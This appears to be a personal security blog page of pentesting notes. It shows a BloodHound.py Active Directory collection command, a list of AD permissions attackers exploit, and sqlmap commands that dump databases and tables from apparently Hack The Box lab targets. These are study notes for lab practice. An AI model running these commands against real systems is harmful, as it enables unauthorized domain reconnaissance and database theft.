>python3 ./bloodhound.py -c ALL -u [ID] -p [PW] -d domain.local -dc dc01.domain.local -ns 10.10.10.192-c means All collection methods, -u means ID, -p means PW, -d means domain name, -dc DC name(can not use IP), -ns means DNS server IP
關於作者
Nelley,乃力。
就是一個村民。
就是一個村民。
相關案例
2022/10/04
進攻是最好的防守
Windows PrivEsc Some of the Active Directory object permissions and types that we as attackers are interested in:1. GenericAll - full rights to the object (add users to a group or reset user's password)2. GenericWrite - update object's attributes (i.e logon script)3. WriteOwner - change object owner to attacker controlled user take over the object4. WriteDACL - modify object's ACEs and give attacker full control right over the object5. AllExtendedRights - ability to add user to a group or reset...
2022/09/09
進攻是最好的防守
sqlmap >sqlmap -u plugins/lcars/lcars_db.php?query=1 --batch batch means never ask user input, use the default behavior >sqlmap -u http://htb/administrative --data "uname=123&password=456" --privileges Retrieve the privileges the current user is having. For example, read the FILE >sqlmap -u http://htb/administrative --data "uname=123&password=456" --batch Test Post parameter by data option >sqlmap -u plugins/lcars/lcars_db.php?query=1 --batch --dbs fetch the DB information >sqlmap -u plugins/lcars/lcars_db.php?query=1 --batch --tables -D [DB name] Fetch tables in a specific DB >sqlmap -u plugins/lcars/lcars_db.php?query=1 --batch --dump -T [Table name] -D [DB name]...
